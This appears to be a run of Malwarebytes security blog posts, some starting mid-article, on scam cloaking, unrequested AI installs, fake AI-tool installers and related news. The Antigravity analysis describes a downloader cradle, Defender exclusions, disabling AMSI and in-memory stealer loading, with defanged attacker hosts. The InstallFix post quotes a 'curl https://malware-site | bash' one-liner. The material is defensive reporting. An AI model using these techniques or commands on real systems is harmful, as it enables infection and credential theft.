Because it is feature rich, easy to spin up on regular hosting, and built to filter and route traffic, criminals found they can abuse those capabilities to run scams at scale.
Traffic starts in many places. The scammers used compromised websites, spam emails, social media posts, and online ads, all quietly routing through the same tracking infrastructure.
The scam sites typically promise “Smart AI Trading Technology” or “Intelligent Trading Solutions” and claim consistently high returns, often reinforced with deepfake images or fabricated media to look more credible.
Some parts of the campaign now use deepfake videos and fake interviews with well-known public figures, making it look like a celebrity, or finance expert personally endorses the platform.
Once you follow a link, the cloaking part of the operation kicks in. Cloaking is the trick that makes these scams so hard to see from the outside.
When you click an ad or link, your visit passes through a traffic distribution system (TDS), a kind of router for web visitors that decides which page you see. In these cases, the TDS is connected to the tracker.
The system checks things like:
Your country/region
Your device and browser
Where you came from (Facebook ad, Google ad, email link, etc.)
Sometimes your IP address reputation or other subtle fingerprints
You’re shown the real investment scam landing page only if you match the “ideal victim” profile (for example, a regular consumer in a target country coming from a social media ad).
Everyone else, like a security researcher, ad platform reviewer, or automated scanner, gets shown a benign page, like a generic blog or placeholder site.
How to stay safe
The best way to stay safe is to stay informed about the tricks scammers use. Learn to spot the red flags that almost always give away scams and phishing emails, and remember:
There is no such thing as a risk-free, consistently profitable investment. If you’re looking to invest, navigate directly to known, regulated financial institutions.
Deepfakes are very convincing nowadays, so you will hardly be able to tell the difference between the real celebrity and their deepfake persona.
Don’t act upon unsolicited investment advice, whether it reaches you by email, social media, or sponsored search results.
Google Chrome has been quietly downloading a 4GB AI model onto users’ devices without asking first.
Security researcher Alexander Hanff, aka ThatPrivacyGuy, reports that Chrome has been silently installing Gemini Nano, Google’s on-device AI model, as a file called weights.bin stored in the OptGuideOnDeviceModel directory within users’ Chrome profiles. This 4GB download happens automatically when Chrome determines your device meets the hardware requirements. It does not ask for consent, and sends no notification—not even one of those annoying cookie banners you’ve learned to dismiss without reading.
The Gemini Nano model powers features like “Help me write” text composition assistance, on-device scam detection, and a Summarizer API that websites can call directly. These features are enabled by default in some recent Chrome versions. And here’s the kicker: if you discover the file and delete it, Chrome simply downloads it again.
Why this matters
Let’s start with the obvious problem: a 4GB download isn’t trivial for everyone. If you’re lucky enough to have unlimited fiber internet, you might not notice. But for users on metered connections, mobile hotspots, or in developing countries where data is expensive, Google just cost them real money without permission. For rural users or those with bandwidth caps, this kind of silent transfer can blow through monthly limits in minutes.
Hanff focuses on the environmental angle. He calculated that if this model were pushed to just 1 billion Chrome users (roughly 30% of Chrome’s user base), the distribution alone would consume 240 gigawatt-hours of energy and generate 60,000 tons of CO2 equivalent. That’s not including actually using the model, just the downloads.
But to us, the most troubling aspect is the broader pattern this represents. Just a few weeks ago, we reported another unsolicited AI invasion on our personal computers discovered by Hanff. He documented how Anthropic’s Claude Desktop app, which silently installed browser integration files across multiple Chromium browsers, including five browsers he didn’t even have installed. The integration would reinstall itself if removed, and it also happened without any meaningful user disclosure.
Hanff argues that both cases likely violate EU privacy law, specifically the ePrivacy Directive’s rules about storing data on user devices and the GDPR’s requirements around transparency and lawful processing. While these claims haven’t been tested in court, they highlight a fundamental tension: can companies just install whatever they want on your computer as long as they say it’s a feature of an app you installed?
Google might argue that having an AI on your device provides better privacy than cloud-based alternatives. Which is generally true, but it does not apply here, since Chrome’s most prominent AI feature—the “AI Mode” pill in the address bar—doesn’t even use the local model. According to Hanff’s analysis, it routes queries to Google’s cloud servers anyway.
All in all, users see a 4GB local AI model and reasonably assume their data stays private, when in reality, the most visible AI feature sends everything to Google’s servers.
Tech companies need to stop treating silent deployment as acceptable practice. We see no valid excuse for this. Your device is yours. The storage is yours. The bandwidth is yours. And the electricity bill is yours.
What happened to asking for permission? And when I remove it, I want it gone permanently—not automatic reinstallation.
When are the tech giants going to learn that we don’t want to be left discovering after the fact that our devices have become deployment targets for features we never asked for.
Update May 12, 2026 with do it yourself instructions
How to check if the AI model is on your computer (Windows)
Open File Explorer
At the top of the File Explorer window, click the address bar and paste:
%LOCALAPPDATA%\Google\Chrome\User Data
Press Enter
Look for a folder named:
OptGuideOnDeviceModel
If you see it, Chrome has likely downloaded the AI model
Properties of the folder
How to check on a Mac
Open Finder
In the menu bar at the top of the screen, click Go > Go to Folder
Paste:
~/Library/Application Support/Google/Chrome/
Look for a folder named:
OptGuideOnDeviceModel
Now, remember, this isn’t malware, and its presence doesn’t mean your computer is infected.
Turn off Chrome AI features
This part is relatively easy. You may find online instructions telling you to edit the Windows registry or use Chrome policies, but for most people the simplest and safest approach is to disable the features directly in Chrome.
We don’t recommend manually editing the registry unless you fully understand what you’re doing. Incorrect changes can cause system problems.
Instead, try this first:
Open Chrome
You can copy and paste this directly into Chrome’s address bar and press Enter:
chrome://settings/ai
On the page that opens, you can turn off features such as:
“Help me write”
AI summaries
On-device AI features
The exact options may vary depending on your Chrome version and region.
Then restart Chrome to make sure the changes take effect.
This may stop Chrome from downloading or using the AI model, although some users report the files can return after browser updates.
There is probably no need to delete the files unless you specifically need the storage space.
If chrome://settings/ai does not work, the feature may not yet be available in your region, you may be using a managed work or school account, or your version of Chrome may not support these settings yet.
Do you need to delete the OptGuideOnDeviceModel folder?
You can, but there is probably no need to.
If you disable Chrome’s AI features, the downloaded model should no longer be actively used for those features. Leaving the files in place may also prevent Chrome from downloading them again at a later point.
Browse like no one’s watching.
Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free →
Your prices could be going up because of a little something that one group has started calling the “cyber tax.”
Not a “tax” in any regulatory sense of the word, this newly named “cyber tax” is instead a consequence of the growing number of cyberattacks on small businesses. According to the latest research from the Identity Theft Resource Center, 81% of small- and medium-sized businesses suffered a data breach, a security breach, or both, within the past year. And of those businesses, more than 50% of lost more than $250,000.
According to the most recent data from the US Federal Reserve, the median American family has just $8,000 in savings, meaning that a hit of $250,000 could bankrupt a family and turn their lives upside down. But there’s an interesting layer within this data—the median American family is quite similar to the median American business. In fact, they’re often the exact same person.
The local grocer, the nearby HVAC repair service, the avid cyclist who just opened a bike shop, and the tax professional, and physical therapist helping out neighbors are everyday individuals and family members. They do not have multimillion dollar corporations at their backs, supporting them with legal teams, insurance policies, and dedicated IT support teams.
A loss of $250,000, then, is a potential loss of their business. And to stay afloat, the Identity Theft Resource Center found, for the first time ever, that 38% decided to raise their prices.
“It was near 40% said ‘We actually had to raise prices—we had to pass this cost onto our customers,’” said Eva Velasquez, CEO of the Identity Theft Resource Center. “We’re now really seeing the long-term downstream effects of cyberattacks.”
As frustrating as the cyber tax can be, small businesses themselves are also facing a new wave of cyberattacks, from AI-powered phishing emails so convincing that small business owners can’t tell the legitimate from the illegitimate, to deepfake calls that impersonate the CEO of a three-person company, to supply-chain attacks that target small companies as a way to reach bigger ones.
Today, on the Lock and Code podcast with host David Ruiz, we speak with Velasquez about cybercrime’s impact on small businesses, the new threats being deployed because of AI, and what is necessary to protect business owners and their consumers.
“Great businesses with great protocols in place can still have a vulnerability exploited because this is what the cyber bad guys are doing all day long. They only have to be right once, whereas small business owners have to be right 100% of the time.”
The internet’s chatbots have read every forum rant, leaked Slack log, and confident blog post your uncle ever wrote about chemtrails. The results are predictable: they reflect the state of the internet, and it isn’t pretty. That, along with some questionable design decisions, is partly why Elon Musk’s Grok chatbot briefly generated antisemitic content and referred to “MechaHitler” during testing.
Wouldn’t it be nice if we had a chatbot that only draws on knowledge from before the internet, reality TV, or AI-slop content ever existed? Three researchers have created just that: a chatbot that hasn’t read anything published after 1930.
Talkie is a 13-billion-parameter language model trained on digital scans of English-language texts published before the end of 1930. That cutoff aligns with the current US public domain year, meaning anything published until the end of that year is fair game and there are no lawsuits from irate IP-holders to worry about.
David Duvenaud, an associate professor of computer science and statistics at the University of Toronto, led the work with two collaborators. You can download it from GitHub or Hugging Face, or chat with it through a web interface, if you don’t mind a model whose mental map of the world ends with the Great Depression.
The model knows only what appears in books, newspapers, legal texts, and other publications before its cutoff date. So it’s great for questions about Prohibition or World War One. NASA’s first moon landing? Not so much.
Why bother?
The obvious question: why train an AI that doesn’t know what the Nazis did, what the internet is, or what an LLM even is?
These aren’t so much exercises to look at the “good old days” through rose-colored glasses so much as intellectual experiments. Nostalgia misrepresents the past, and the world was just as problematic back then, if not more so.
Duvenaud told The Register that such a model could be useful for examining how people might have interpreted laws or events at the time, using only the knowledge available then.
Another fun experiment: Use it to see whether a model can “rediscover” later breakthroughs using only earlier knowledge, as a way of probing the limits of AI reasoning.
Where it breaks
There are definite weaknesses in Talkie, which its inventors are well aware of.
For example, there was no digital publishing in 1930, so every word of Talkie’s corpus had to be transcribed from a scan. OCR is famously imperfect anyway, but more so on the blurry text printed back in the day.
It also leaks future information that can sometimes creep in from mislabeled future documents, despite the researchers’ best efforts. We asked it about television, which was just starting out in the late 1920s, and this is what happened:
But still, what an absorbing project. It isn’t alone, either. In their paper, the researchers mention other projects such as Ranke-4b from the University of Zurich, a series of LLMs with historical snapshots of data. “Trip” also created Mr Chatterbox, which he trained on a dataset of British literature from 1500–1900 to become, in his words, “a Victorian gentleman in silicon.” Magic.
These are both a fun experiment and a useful insight into the workings of AI. As the Talkie researchers put it:
“Have you ever daydreamed about talking to someone from the past? What would you ask someone with no knowledge of the modern world? What would they ask you?”
And they provide some fun-making opportunities. The nerd in us still wants to hook one of these things up to an Edwardian typewriter keyboard and a ticker tape, steampunk-style.
Your name, address, and phone number are probably already for sale.
Data brokers collect and sell your personal details to anyone willing to pay. Malwarebytes Personal Data Remover finds them and gets your information removed, then keeps watch so it stays that way.
Claims like that are bound to create two sides, so we searched for an official rebuttal by Anthropic. But we couldn’t find one. It would surprise me very much if they’d be unaware of the claim, since there’s been some noise about it.
Users on Mastodon, Reddit, and LinkedIn are confirming the researcher’s findings and discussing the subject, so it’s hard to imagine Anthropic missed it.
Let’s look at the claims first.
While looking into another matter, the researcher discovered a Native Messaging host manifest on his Mac that he did not knowingly install. On Chrome and other Chromium-based browsers, extensions can exchange messages with native applications if they register a native messaging host that can communicate with the extension.
By testing on a clean machine, Hanff discovered that Installing Claude Desktop for macOS drops a Native Messaging host manifest into multiple Chromium profiles (Chrome, Edge, Brave, Arc, Vivaldi, Opera, Chromium), even including for browsers that are not actually installed yet.
The Native Messaging host manifest tells a Chromium‑based browser which local executable to invoke when an extension calls a native host, and those hosts run outside the browser sandbox with current users permissions. Hanff therefore describes this as a “backdoor.” The manifest pre‑authorizes three Chrome extension IDs, so any extension with those IDs can call the helper via connectNative, giving it access to browser automation features.
Another objection is that Claude makes simple deletion futile since the manifest will be recreated the next time the user launches Claude Desktop.
It’s important here to point out that his article is about Claude Desktop, the Electron-based macOS application with bundle identifier com.anthropic.claudefordesktop, distributed as Claude.app. It is not about Claude Code, Anthropic’s command line developer tool. Claude Code is autonomous (“agentic”), allowing you to hand over a task, and it handles the planning and execution until done. So, for Claude Code, it would absolutely make sense to enable communication with browsers, provided they are present on the target system.
So, we have an application that writes into other apps’ profile/support directories (the browsers’ configuration area) and can act as the user, with capabilities like using the logged‑in browser session, DOM inspection, data extraction, form filling, and session recording. This expands the attack surface of every machine this manifest is dropped on, without asking for consent.
Anthropic’s own launch blog on “Claude for Chrome,” which discusses Anthropic’s internal red‑team experiments, explicitly mentions prompt injection as a key risk and reports attack success rates of 23.6% (no mitigations) and 11.2% (with mitigations). Hanff cites this to argue that a pre‑positioned bridge is a non‑trivial risk.
How bad is it?
Native Messaging is a standard Chromium mechanism. Nothing here is an unknown or exotic technique per se. Chrome’s own documentation explains that Native Messaging hosts run at user privilege and are invoked by browser extensions through a manifest file. And as the researcher pointed out, the bridge does nothing. But it could potentially be abused.
I don’t think it’s fair to say that Claude Desktop installs spyware, but it does open a system up by expanding the attack surface.
Anthropic already had a separate, documented Native Messaging manifest for Claude Code that users sometimes manually copied into other Chromium browsers; the new behavior is that Claude Desktop now drops a Claude‑Desktop‑related manifest into multiple browser paths automatically.
It requires a combination of extension and host. Only combined with a matching browser extension, this bridge enables the user-like capabilities we listed earlier.
What we don’t know yet
Anthropic hasn’t published a detailed technical privacy spec for the Claude Desktop–browser bridge, so we don’t know exactly what data flows when the Chrome integration is used, beyond the general capabilities described in their documentation (session access, DOM reading, etc.).
The detailed analysis and most replication so far are on macOS. We’re in the dark about behavior on Windows and Linux, and the same is true across different browser install paths. That behavior has also not been comprehensively documented in public write‑ups.
I did reach out to Anthropic asking for a response. If and when we get an official response from Anthropic, I’ll add it here, so stay tuned.
Conclusion
Anthropic likely wanted “Claude in Chrome”‑style capabilities across Chromium‑based browsers, but that doesn’t excuse doing it silently and preinstalling the manifest into profile directories for multiple browsers, including ones that are not yet installed.
There are better ways to implement changes like these, and users should at least be made aware of them so they can weigh the advantages against the potential risks.
Stop threats before they can do any harm.
Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →
Somebody went looking for Google’s new Antigravity coding tool this week, clicked download, ran the installer, and got exactly what they thought they were getting. Antigravity installed cleanly. A shortcut appeared on the desktop. The application opened and worked. Nothing looked or felt wrong.
But behind the scenes, that installer can give your accounts, your data, and even your machine to an attacker, without breaking anything the user can see.
In this article, we’ll break down the technical details of the campaign, how it works under the hood, and what to do if you think you’ve installed it.
The download that actually gave you what you wanted
Google Antigravity launched in November 2025 and has been one of the most searched-for developer tools on the web ever since. The real product lives at antigravity.google. Hardly anyone new to the product has the real URL memorized, so when a user reached a hyphenated lookalike (what we call a typosquat domain) at google-antigravity[.]com it was convincing enough at a glance.
So they went on to download the file, called Antigravity_v1.22.2.0.exe.
The installer isn’t simply named to look like the real one from Google. It’s 138 MB: large enough to carry the entire Antigravity application, its Electron runtime, its Vulkan graphics libraries, its updater, all of it. Because that is what is actually inside.
The attacker didn’t build a convincing fake; they took the genuine Antigravity installer, added one additional step to run their PowerShell script during setup, and repackaged the result. The malicious step is one extra line in a sequence that runs dozens of legitimate ones. Here’s what the Setup looked like:
How do we know it’s one line? Because you can see it.
The MSI’s custom-action table (the list of every step the installer takes during install) contains 11 rows that are standard, boilerplate entries the installer tool generates automatically: extract files, check the Windows version, elevate to admin, write a log, clean up afterwards. Each of those has a name that starts with AI_ followed by a description of what it does. And then, sitting at the bottom of the same list, there is one more row, named wefasgsdfg — a keyboard mash the attacker typed in when the installer tool prompted them for a name, and the one that runs their PowerShell script.
Antigravity installs properly into C:\Program Files (x86)\Google LLC\Antigravity\. A Start Menu entry appears, a desktop shortcut is placed, and everything works. The user opens the app, tries it, closes it, and goes on with their day. It all seems fine, because they actually installed the thing they wanted to install. The malicious part is happening quietly, in a folder they’ll never open.
Two small scripts, and a phone call
Somewhere in the middle of the install, the MSI runs a small helper script that drops two PowerShell files into the user’s temporary folder: scr5020.ps1 and pss5032.ps1. The filenames look like specifics but aren’t: the four characters after each prefix are generated fresh every time the installer runs.
What stays constant is the prefix: scr for the user script, pss for the PowerShell wrapper, because those come from the installer tool’s standard naming pattern for custom-action scripts.
Of the two files, the second is an unaltered Advanced Installer utility. It’s genuinely innocent and present in many real products. The first was added by the attacker, and it has one job: open an HTTPS connection to https://opus-dsn[.]com/login/, download whatever code the server sends back, and run it. To blend in, it spoofs a Microsoft referrer header and routes through the system’s default web proxy, so it inherits whatever corporate proxy configuration and authentication IT has set up, without the user noticing. It also saves and restores the parent PowerShell’s TLS setting, leaving that one global unchanged after it exits. That’s the entire script.
Researchers call this pattern a downloader cradle, and its advantage to the attacker is flexibility. The real payload lives on their server, not inside the installer out in the wild, so they can swap it out, change targeting, or turn the operation off without touching the file users are downloading.
In this case, the cradle did exactly what it was built to do and no more: a DNS query for opus-dsn[.]com, a single TCP connection on port 443 to 89[.]124[.]96[.]27 with a quiet HTTPS GET to /login/, and then the PowerShell process exited.
Nothing else happened. No second-stage script was fetched. No file was dropped. No scheduled task was created. No changes were made to Windows Defender. Most automated security tools would shrug and move on.
But the malware hadn’t failed. It had introduced itself to the attacker’s server and asked for code to run next—and whether the answer comes back is a decision the operator gets to make later, on their own time, one victim at a time. You cannot tell, from the victim’s side, what was returned. For analysis, we retrieved what the server sends when the answer is yes.
What arrives when the answer is yes
When the server decides a target is worth attacking, the follow-on script does its work in three movements.
First, it makes Defender look the other way. It calls Add-MpPreference (with the cmdlet name split by a backtick, a small obfuscation to dodge naïve string-matching detections) to exclude %ProgramData% and %APPDATA% from scanning, exclude .exe, .msi, and .dll files from scanning, and exclude PowerShell, regasm.exe, rundll32.exe,msedge.exe, and chrome.exe from scanning. Only after that does it phone home—collecting a profile of the machine (Windows version, Active Directory domain, installed antivirus product), RSA-encrypting it with a public key embedded in the script, and sending it to opus-dsn[.]com inside a utm_content query parameter that looks, in any access log, like ordinary marketing tracking. This is the profile the operator uses to decide whether this particular machine is worth the next stage.
Second, it widens the gap. A second Add-MpPreference block extends the exclusion list to include the .png file extension and the conhost.exe process—the exact two additions the next stage will need. It then writes AmsiEnable=0 into HKLM\Software\Policies\Microsoft\Windows Script\Settings, disabling Windows’ Antimalware Scan Interface—the layer that normally lets Defender read scripts before they execute. After this point, the malicious activity is being conducted in folders, with file types, and through processes that Defender has been instructed to ignore.
Third, it stages persistence. It downloads a file called secret.png from https://captr.b-cdn[.]net/secret.png (a BunnyCDN URL that looks at a glance like any other content-delivery link) and saves it to C:\ProgramData\MicrosoftEdgeUpdate.png, a path chosen to sit beside Microsoft’s real browser-update folders. The file is not an image. It is an AES-256-CBC ciphertext (key and IV both derived via PBKDF2 with 10,000 iterations from a hardcoded passphrase) wrapping a .NET assembly. A scheduled task is then registered with the name MicrosoftEdgeUpdateTaskMachineCore{JBNEN-NQVNZJ-KJAN323-111}, which is all but indistinguishable at a glance from the real Microsoft Edge update task and set to fire at every logon, running unprivileged so it never produces a UAC prompt. The action it executes is conhost.exe --headless launching a hidden PowerShell, which decrypts the fake PNG in memory and reflectively loads the resulting .NET assembly into its own address space. Nothing lands on disk as an ordinary executable. All that persists is the encrypted image, in a folder Defender has been asked to ignore.
And then a second payload, that doesn’t persist at all. The script doesn’t stop there. After registering and starting the scheduled task, it sends a second beacon to confirm install, then runs an entirely separate block that downloads a second encrypted file (GGn.xml) from the same BunnyCDN host, decrypts it with a different, hardcoded AES key, and reflectively loads that assembly into the running PowerShell process too. The first payload survives reboots; this one runs once, in memory, and is gone. Two .NET assemblies, one campaign, on the victim.
What the payload is built to do
The decrypted assembly is a .NET stealer. We can characterize it from its own class and method names, which describe its job in plain English: it scans browsers, messaging apps, gaming platforms, FTP clients, and crypto wallets, collecting data labeled Logins, Cookies, Autofills, and FtpConnections.
In practice, that means every Chromium- and Firefox-based browser on the machine (Chrome, Edge, Brave, and others) gets stripped of saved passwords, autofill data (including saved credit cards), and the cookies that keep users signed in. Discord tokens, Telegram sessions, Steam logins, FTP credentials, and cryptocurrency wallet files are taken as well.
(Most of the exact target paths are obfuscated and only decrypted at runtime, so the specific apps aren’t all visible from a static analysis, but the categories of theft are clear from the class names.)
Session cookies are the part that should alarm most people, because they work faster than anything else. A stolen login cookie lets an attacker walk straight into a Gmail inbox or banking portal without needing a password or triggering two-factor authentication. As far as the website is concerned, the user is already signed in. The gap between infection and account takeover can be minutes.
Beyond data theft, the malware also imports Windows APIs used for clipboard hijacking and keystroke logging, tools that can capture what you type or swap a cryptocurrency wallet address at the exact moment you send funds.
It also includes the building blocks for “hidden desktop” tradecraft: creating a second, invisible Windows desktop that the attacker can capture and potentially control. In its most advanced form, this lets an attacker operate inside that hidden environment—logging in to accounts, approving transactions, or sending messages—while the victim’s real screen shows nothing unusual. For the duration of the infection, the attacker is, effectively, a second presence on the computer.
A new tool, a new lookalike, the same trap
The reason this campaign matters beyond the single installer is that its shape isn’t new. It’s a refined version of a pattern we’ve been watching for months: new AI products launch with huge attention, and within weeks, lookalike domains and trojanized installers appear alongside them. Antigravity is the latest example, but it won’t be the last.
The incentive for attackers is obvious. Every high-profile AI launch creates a surge of users who want to try it immediately, before they’ve had time to memorize the real URL, or might fail to double-check it against trusted sources.
What makes this style of campaign hard to spot is that most victims never know they were targeted. Those who escaped, because the operator chose not to escalate on their machine, have no reason to think anything happened.
The ones who didn’t escape usually find out later: a password reset they didn’t request, a friend asking about a strange message, or a bank balance that suddenly looks wrong. By then, the decision to target them was made days earlier.
What to do if you may have been affected
If you or anyone who shares your computer recently installed something calling itself Google Antigravity from anywhere other than antigravity.google, start by checking the network indicators. Look in firewall logs, EDR alerts, or your router logs for connections to opus-dsn[.]com, captr.b-cdn[.]net, or 89[.]124[.]96[.]27. A single connection from a PowerShell process is enough to confirm the check-in happened.
From a different, clean device, sign out of every active session on your important accounts: Google, Microsoft 365, any banking portal, GitHub, Discord, Telegram, Steam, and your crypto exchange. Most services have a “sign out everywhere” option under security settings.
Change passwords on those accounts, starting with your email. If your email is compromised, an attacker can reset almost anything else.
Rotate any API keys, SSH keys, or cloud credentials that were on the affected computer, not just the passwords attached to them.
If you have cryptocurrency wallets on the machine, move the funds from a clean device immediately. This is what these operators monetize first.
Watch your bank and credit card statements for unfamiliar charges, and consider placing a fraud alert with your bank.
Wipe and reinstall Windows. A machine that has run this class of malware should not be trusted.
If the machine is a work laptop, tell your IT or security team today. The beacon collects the machine’s Active Directory domain, so on a domain-joined corporate laptop, the attacker now knows which company’s network this victim belongs to, which means this isn’t just a personal problem.
Anthropic’s most capable model to date, Claude Mythos Preview (aka Mythos), has been described as a “step change” in AI performance, especially on cybersecurity tasks.
Anthropic tried to keep Mythos a secret until a few weeks ago, when a data leak revealed the existence of what the company said was its most powerful artificial intelligence to date. The models is seen as both a powerful defensive tool, and, potentially, a serious offensive cyberweapon.
For that reason, the company is sharply limiting access and signaling it does not plan to release it broadly to the market right now. Its reported ability to autonomously find and even chain software vulnerabilities at scale sit at the core of both the hype and the danger.
Imagine a tool that can independently find new vulnerabilities in software, systems, and platforms, then turn them into exploits, even if that requires chaining them with other vulnerabilities.
In the wrong hands, that could be a major threat to our cyber safety. So Anthropic has limited access to a small number of organizations worldwide, including major tech firms and a select group of government or security bodies. The NSA is reportedly already using Mythos Preview, apparently to stress‑test and harden sensitive systems, despite the Pentagon labelling Anthropic as a supply chain risk.
Mythos can discover vulnerabilities across large codebases more quickly and reliably than existing tools, and can look for multiple flaws in one system and combine them into multi‑step exploit chains to complete a compromise (for example, going from a simple web bug to a full domain takeover). It would take a bug bounty hunter months to find another vulnerability, let alone one chainable with the one(s) already discovered. Accomplishing that before the first one would be highly unlikely.
In practical terms, that could mean faster attacks, more complex breaches, and less time for companies to fix weaknesses before they’re exploited.
Anthropic itself has highlighted that Mythos can work with minimal supervision for extended periods, meaning it could run systematic attack campaigns at a scale no human team could accomplish.
AI lowers the skill floor for offensive operations. Less-skilled actors could get access to very effective tools, significantly increasing the number of advanced attacks.
Techniques like fuzzing, dictionary attacks, and other brute force methods become much more effective when sped up by automation. AI-assisted iteration can provide an attacker with a lot more tries before an attack gets noticed.
But the most concerning conclusion was that the offensive side is iterating faster in the current phase of AI development, and security teams are generally later adopters of AI tooling than their adversaries.
As we know, AI in cybersecurity works both ways. It helps us defend against new threats, but it can also be used to create them. Which is why, in the wrong hands, Mythos can turn out to be a formidable adversary.
The goal stays the same, but the way to get there is paved by tools like Mythos. From the attacker’s seat, nothing about the destination is new. The novelty is that Mythos now automates the map, the vehicle, and most of the driving.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments.
Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter. That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator.
Researchers found that attackers abuse this workflow by keeping everything identical, only changing where that one‑liner actually connects to. For many non‑specialist users who just started using AI and developer tools, this method feels normal, so their guard is down.
But this basically boils down to “I trust this domain” and that’s not a good idea unless you know for sure that it can be trusted.
It usually plays out like this. Someone searches “Claude Code install” or “Claude Code CLI,” sees a sponsored result at the top with a plausible URL, and clicks without thinking too hard about it.
But that ad leads to a cloned documentation or download page: same logo, same sidebar, same text, and a familiar “copy” button next to the install command. In many cases, any other link you click on that fake page quietly redirects you to the real vendor site, so nothing else looks suspicious.
Similar to ClickFix attacks, this method is called InstallFix. The user runs the code that infects their own machine, under false pretenses, and the payload usually is an infostealer.
The main payload in these Claude Code-themed InstallFix cases is an infostealer called Amatera. It focuses on browser data like saved passwords, cookies, session tokens, autofill data, and general system information that helps attackers profile the device. With that, they can hijack web sessions and log into cloud dashboards and internal administrator panels without ever needing your actual password. Some reports also mention an interest in crypto wallets and other high‑value accounts.
Windows and Mac
The Claude Code-based campaign the researchers found was equipped to target both Windows and Mac users.
On macOS, the malicious one‑liner usually pulls a second‑stage script from an attacker‑controlled domain, often obfuscated with base64 to look noisy but harmless at first glance. That script then downloads and runs a binary from yet another domain, stripping attributes and making it executable before launching it.
On Windows, the command has been seen spawning cmd.exe, which then calls mshta.exe with a remote URL. This allows the malware logic to run as a trusted Microsoft binary rather than an obvious random executable. In both cases, nothing spectacular appears on screen: you think you just installed a tool, while the real payload silently starts doing its work in the background.
How to stay safe
With ClickFix and InstallFix running rampant—and they don’t look like they’re going away anytime soon—it’s important to be aware, careful, and protected.
Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Analyze what the command will do, before you run it.
Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!
Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Attackers are abusing OpenClaw’s popularity by seeding fake “installers” on GitHub, boosted by Bing AI search results, to deliver infostealers and proxy malware instead of the AI assistant users were looking for.
OpenClaw is an open‑source, self‑hosted AI agent that runs locally on your machine with broad permissions: it can read and write files, run shell commands, interact with chat apps, email, calendars, and cloud services. In other words, if you wire it into your digital life, it may end up handling access to a lot of sensitive data.
And, as is often the case, popularity brings brand impersonation. According to researchers at Huntress, attackers created malicious GitHub repositories posing as OpenClaw Windows installers, including a repo called openclaw-installer. These were added on February 2 and stayed up until roughly February 10, when they were reported and removed.
Bing search results pointed victims to these GitHub repositories. But when the victim downloaded and ran the fake installer, it didn’t give them OpenClaw at all. The installer dropped Vidar, a well‑known information stealer, directly into memory. In some cases, the loader also deployed GhostSocks, effectively turning the victim’s system into a residential proxy node criminals could route their traffic through to hide their activities.
How to stay safe
The good news is that the campaign appears to have been short-lived, and there are clear indicators and mitigations you can use.
If you downloaded an OpenClaw installer recently from GitHub after searching “OpenClaw Windows” in Bing, especially in early February, you should assume your system is compromised until proven otherwise.
Vidar can steal browser credentials, crypto wallets, and data from applications like Telegram. GhostSocks silently turns your machine into a proxy node for other people’s traffic. That’s not just a privacy issue. It can drag you into abuse investigations when someone else’s attacks appear to come from your IP address.
If you suspect you ran a fake installer:
Disconnect the machine from your network, then run a full system scan with a reputable, up‑to‑date anti‑malware solution.
Change passwords for critical services (email, banking, cloud, developer accounts) and do that on a different, clean device.
Run OpenClaw (or similar agents) in a sandboxed VM or container on isolated hosts, with default‑deny egress and tightly scoped allow‑lists.
Give the runtime its own non‑human service identities, least privilege, short token lifetimes, and no direct access to production secrets or sensitive data.
Treat skill/extension installation as introducing new code into a privileged environment: restrict registries, validate provenance, and monitor for rare or newly seen skills.
Log and periodically review agent memory/state and behavior for durable instruction changes, especially after ingesting untrusted content or shared feeds.
Understand and provide for the event where you may need to nuke‑and‑pave: keep non‑sensitive state snapshots handy, document a rebuild and credential‑rotation playbook, and rehearse it.
Run an up-to-date, real-time anti-malware solution that can detect information stealers and other malware.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
On Friday the US Pentagon cut ties with Anthropic, the company behind Claude AI. Defense Secretary Pete Hegseth designated the San Francisco-based company a “supply-chain risk to national security.”
The supply-chain risk designation means that no contractor, supplier, or partner doing business with the US military can deal with Anthropic. The label previously applied only to foreign adversaries like Huawei, though, and using it against a US company marks a rare escalation in a government-industry dispute. According to reports, President Donald Trump also ordered every federal agency to stop using Anthropic’s technology.
What Anthropic wouldn’t budge on
Anthropic called the designation “unlawful and politically motivated” and said it intends to challenge it in court.
At the center of the dispute is how far Anthropic believes its models should be allowed to go inside military systems. Anthropic, which was the first frontier AI company deployed on the military’s classified networks, wanted two contractual restrictions on its AI model Claude, as outlined in its response to the Pentagon’s announcement. It forbade the Pentagon to use its tech for the mass domestic surveillance of Americans and did not want its tech employed in fully autonomous weapons.
The Pentagon had previously demanded that all AI vendors agree to “all lawful purposes” language as part of their contracts. Anthropic told ABC that what the Pentagon finally offered left the door open for the government to violate the company’s no-surveillance and no-weapons clauses.
Defense Secretary Hegseth responded with a statement cancelling Anthropic’s $200m Pentagon contract, awarded last July. He accused Anthropic of attempting to seize veto power over military operations and called the company’s position fundamentally incompatible with American principles.
Anthropic’s CEO Dario Amodei called the government’s response retaliatory and punitive and promised to challenge the designation in court.
Legal scholars suggest that the AI company could have a strong case, questioning whether Hegseth can meet the statutory requirements for such a designation, which is allegedly intended to protect military systems from adversarial sabotage rather than resolving a commercial disagreement over contract terms.
